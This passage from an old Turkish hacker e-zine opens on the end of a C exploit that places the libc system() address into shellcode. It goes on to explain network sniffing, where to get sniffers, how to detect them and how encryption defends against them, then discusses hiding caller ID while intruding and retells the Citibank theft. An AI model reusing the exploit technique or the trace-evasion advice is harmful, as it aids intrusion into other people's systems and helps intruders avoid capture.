/* most [linux] systems keep libc functions in the same place */
i=(int)system;memcpy(&shellcode,&i,sizeof(int));
write(1,s,500+(sizeof(shellcode)-OFFSET));
fetch((int*)&shellcode);
usleep(1000000);
return 0;
}

 

Bilgisayarınızda bir programı çalıştırırken çok dikkatli olun.Hele hele bu programı size Efnetli bir IRC lamerı vermişse....


6. Sniffing Nedir?

Sniffer nedir ve nasıl çalışır?

Birden fazla bilgisayarı,birbirine bağlayarak aralarında bir paylaşım kurmak masraflı bir iştir. Paylaşım,bir bilgisayardaki bilgilerin,başka bir bilgisayara aktarılması olarak açıklanabilir. Bu iki bilgisayar arasında yapılan bilgi alış-veriş ini yakalamaya "sniffing" denilir. Bir kaç bilgisayarın,bir ağ üzerinde birbirleriyle paylaşıma açık olarak bağlanılmasında kullanılan en popüler yol "ethernet" dir.Ethernet protokolü bir bilgi paketini aynı devreler üzerindeki tüm bilgisayarlara yollayarak çalışır.Gönderilen paketin başlığında,paketin gideceği bilgisayarın adresi yazar.Sadece bu paketteki adres ile adresi tutan makine bu bilgileri alabilir.Her paketi kabul eden bir makine,paket başlığındaki adrese aldırmayan makine,çok karışık bir hal alacaktır. Bu karışıklık sayesinde,sniffer işini görecektir.

Normal bir networkte,account ve şifreler ,ethernet üzerinde düzgün bir yazıyla(encrypt edilmemiş) gidip gelirler.Bir ziyaretçi,ethernet üzerindeki herhangi bir makineden root yetkisi elde ederse, sistemi sniffleyerek ağ üzerinde ki diğer makinelerde de çok rahat "root" elde edebilir.  

- Snifferları nereden bulabilirim?

Sniffing,hackerlar tarafından kullanılan en önemli hack yöntemlerinden biridir.Sniffer denilen bu programları,netde bir çok yerden bulabilirsiniz.Fakat hepsi,gerçekten çalışırmı bilmiyorum. Onun için çalıştığına şahit oldugum bir sniffer dan bahsedicegim.Esniff.c!SunOS da çalışmak için dizayn edilmiş,küçük boyutta ve sistemde ki tüm telnet,ftp ve rlogin sezonlarının ilk 300 byte ını yakalayabilen bir program.Esniff.c,ilk kez *Phrack* de ünlendi.Bu programı bir çok FTP server da bulabilirsiniz.(coombs.anu.edu.au:/pub/net/log.)

Ünlenmiş bir kaç tane Snifferıda söylemeden geçemiyeceğim,
* SunOs4.1.x için Etherfind
* Solaris 2.x ve SunOs 4.1 için Snoop!(ftp playground.sun.com)
Dos tabanlı snifferlar
* Gobbler
* ethdump v1.03(ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip)

* ethload v1.04(ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip)
Ticari snifferlar
* Network General
* Microsoft's Net Monitor

- Sistemimizde sniffer çalıştığını nasıl anlarız?

Bir sistemde sniffer çalıştıgını remote olarak anlamamız mümkün değildir. Sniffer çalışan makina,her paketi kabul eder ve çok karmaşık bir hal alır.Bir çok Unix tabanlı İşletim sisteminde,sistemde sniffer olup olmadığını anlamanın yolları vardır. SunOS,BSD,Linux ve diğer bir çok Unix tabanlı OS larda bir komut bulunur..

"ifconfig -a"

Bu komut,tüm arayüzleri kontrol edecek ve sistem de bir abukluk varsa size bildirecektir.Ama bazı OS larda bu komutu çalıştırmak için bazı device adresleri falan girmek gerekir (IRIX gibi..)Onun için başka bir komut daha söyleyeyim.(Aşağıdaki örnek tamamen hayalidir.)

# netstat -r
Routing tables
Internet:
Destination Gateway Flags Refs Use Interface
default infern0.com UG 1 24949 virgo
localhost localhost UH 2 83 le0

Bu komutdan sonra gördüğümüz tüm arayüzleri kontrol edebiliriz.Örnek
,

# ifconfig virgo
virgo: flags=8863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST>
inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1

Bu komutların dışında "cpm" adında snifferları tespit eden bir program vardır.Sadece SunOS ta çalışır ve tüm aray
üzleri kontrol eder.(ftp.cert.org:/pub/tools/cpm)

Ultrixde ise,sistemde sniffer çalışıp calışmadığını "pfstat ve pfconfig" komutlarını kullanarak öğrenebiliriz.
pfconfig size kimlerin sniffer kullanıp kullanamayacağını ayarlama olanağı verir. pfstat ise size sistem de ki abukluklukları sıralar.
Bundan başka,üzülerek söylüyorum ki Irix, Solaris ve SCO da sniffer olup olmadığını algılamak biraz zordur.Yani heran bir hacker kardeş içerde snifferları depolamış olabilir. Bir başka yol ise,snifferların log dosya
larının büyümesidir.Hele hele,bazen sniffer sistemde uzun bir load zamanı geçirir.Ve çoğu zaman bazı alarmlar ortaya çıkar.Bu sayede sistem admin'i olayın farkına varır.Ben size lsof(LiSt Open Files) u kullanmanızı öneririm.Bu program ,bazı paket devicelarına (SunOS da /dev/nit gibi..) uzanan dosyaları size gösterir. "coast.cs.purdue.edu:/pub/Purdue/lsof" dan çekebilirsiniz.

- Encryption

Eğer yukarıdaki yollara güvenmiyorsanız,yapabileceğiniz en güzel şeylerden biride paketleri  encryptlemek olabilir.Hacker dostumuz,paketleri yakalayabilir ama gördüklerinden hiç birşey anlamaz.

Bunun için 1-2 program ve adreslerini vereyim,

* deslogin coast.cs.purdue.edu:/pub/tools/unix/deslogin
* swIPe
ftp.csua.berkeley.edu:/pub/cypherpunks/swIPe/
- Kerberos Kerberos da yukarıdakiler gibi paketleri encrypt eden bir programdır.Kerberos "stream-encrypting rlogind" ve "stream-encyrpting telnetd" gibi özelliklerle gelir.Bu sizin sisteme girdikten sonra ne yaptıklarınızı hackerlardan saklamanıza yarar. "tfm.mit.edu" da Kerberos için bir faq bulunuyor.İlgilendiyseniz kaçırmayın dökümanı derim. /pub/usenet/comp.protocols/kerberos
/Kerberos_Users__Frequently_Asked_Questions_1.11

Umarım sniff denilen olayı kavramanıza yardımcı olmuşumdur.
Görüşmek üzere,

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
mQCNAzYxtv0AAAEEAOZM+5YaCE9IJb29f1v9NhVqX2LD++8ed0MvwGgYurgQKUR1
dY6Ehn7GP8IUiE85ZhXTFgqia+JB+V1RTXFZlQJlZiR9FVRD2TWBND6zXFNwB+K2
aSL352d4NXY/Ms9a+pgyiVH9/i7njB722OJrptrCI/cp15lgG50XjFsM9rBNAAUR
tB5PbnVyIEd1bmR1eiA8a2FpQGxpbnV4Lm9yZy50cj4=
=KE54
-----END PGP PUBLIC KEY BLOCK-----


7. Caller ID !!! CityBank Nasıl Hack Edildi

Hacker misin ?
Peki neden yakalandin ?

    Eskiden bluebox vardi: telefon hatlarina gonderdigimiz bazi sinyaller ile kontur atmasini engelliyorduk... Ama takiii digital telefon santralleri gelinceye kadar. Analog santraller digital olunca bluebox da calismamaya basladi. Digital santraller bununla yetinmeyip Caller ID yi de gosteriyordu... Peki caller id ne ? A dan B yi ararken A ring sinyalinden once karsi tarafa bazi sinyaller gonderir. Bu sinyaller caller id dir ve Bu sinyallerde A nin telefon numarasi gizlidir. Ornegin ceptelefonlari, nasil sizi arayanin kim oldugunu gorebiliyorsunuz???? Bunu normal telefonlarda da cok basitce yapabilirsiniz. Yeni cikan telefonlar bu ozelligi destekliyor veya telefona yaklasik 50$ (dogubank fiyati) lik bir alet takarak yine sizi arayanin telefon numarasini ogrenebilirsiniz. Bu caller olayi ISS lerin ve devletin baya i$ini goruyor... Siz bir yeri hack etdiginiz zaman loglardan aninda sizi bulabiliyorlar. Peki bundan nasil kurtulcaksiniz ? Bunun icin bir program duymustum... Program caller id sinyallerini karistirarak yanlis bilgi gonderebiliyormu$ (dikkat mu$ kullandim). Program hakkinda biraz ara$tirma yaptim.
1. Program her santral de calismiyor!
2. Program her modemde calismiyor.
3. Bazen program karsi tarafa baglanirken sorun cikartiyor. Herhalde beta ???
Bakarsiniz ileride caller id spoof olayi filan cikar??? Kim Bilir ?
Peki caller id saklamanin baska yolu yok mu ? Benim bildigim en guvenli yol analog santral kullanmak. Eger analog santral kullanarak bir yeri hack ederseniz. Sizin ancak hangi santralden baglandiginizi bulabilirler. Binlerce telefon numarasindan hangisini kullandiginizi bulamazlar. Ama eger cok isterlerse sizin bulundugunuz santrale bazi aygitlar yerlestirirler. Bu aygitlar sayesinde sizin bulundugunuz yeri sadece siz telefon hattini kullanirken belirlyebilirler. Ayni filimlerdeki gibi ;-)
CityBanki hack edip 10.7 milyon $(dolar) calan Rus Hackerlarda bu yontemi kullanmi$lardi! Peki nasil mi yakalandilar ?
Oncelikle CityBank in bilgisayarlarina 7 santral uzerinden baglaniyorlardi tabiki buda yakalanmalarini zorlastiriyorlardi. Sonra onceden actiklari dunyanin farkli yerlerinde bulunan hesaplara parayi havale ediyorlardi. Parayi havale etdikden en gec 2 gun icinde ma$a olarak kullandiklari insanlar gidip parayi cekiyorlardi. CityBank bunu ogrenince $ok oldu. Cunku bunlari yakalamanin her hangi bir yolu yoktu!!! Bunun uzerine CityBank bir takim kurarak bu adamlara supheli havaleleri kontrol etmelerini soyledi, bunlari yaparken CityBank toplumun bu olaylari duymamasi icin elinden geleni yapiyordu! Bilindigi gibi CityBank dunyanin en buyuk bankalarindan biri ve gunde milyonlarca i$lem yapiliyordu. Bunlarin hepsinin kontrol edilmesi imkansizdi. Bu takim sadece $upheli i$lemleri kontrol ediyordu ve i$lemin hackerlar tarafindan yapildigini anlasa bile parayi cekeni yakalamalari cok zordu cunku hackerlar cok hizli hareket ediyor ve dunyanin degisik yerlerinden para cekiyordu. Bir gun CityBank in $ansi dondu ve bi havale i$lemini yakaladilar. I$lem Newyork daki bir $ubeye 200.000$ (boru degil) havale etmi$ti. Bunun uzerine CityBank hemen harekete gecip FBI ile $ubeyi gozetime aldilar. Nihayet 1 gun sonra bir Rus i$ci emekli cift parayi cekmek icin geldiler. Bu sarada FBI devreye girer cifti yakaladi. Yakalanan ciftden erkek kacmayi ba$arirken kadin FBI tarafindan goz altina alindi. Kadin gozaltinda konu$madi. Erkekde Rusyaya kacti. Bu sirada CityBank hack in nerden gercekle$tigini buldu fakat binlerce telefon kullanicisindan kimin yaptigini bulamadi. Bunun uzerine FBI ve Rus polisi i$birligi yaparak santralle gerekli aygitlari yerle$tirdi. Victim (hacker) bir gun yeni bir havale icin bilgisayarinin ba$ina oturdugu anda FBI tarafindan yakalandi... Olayda RUS MAFYASININ da parmagi oldugu anla$ildi... Bizim Hacker 6 aydir goz altinda hala davasi suruyor... Evet bu tabiki gercek bir olay... Aslinda butun olaylari ve insanlari anlatmadim... Eger anlatmaya kalsaydim kafadan 3-4 saatimi daha yazmakla gecirmem gerekiyordu. Bu aylikda bu kadar onumuzdeki ay goru$uruz... ;)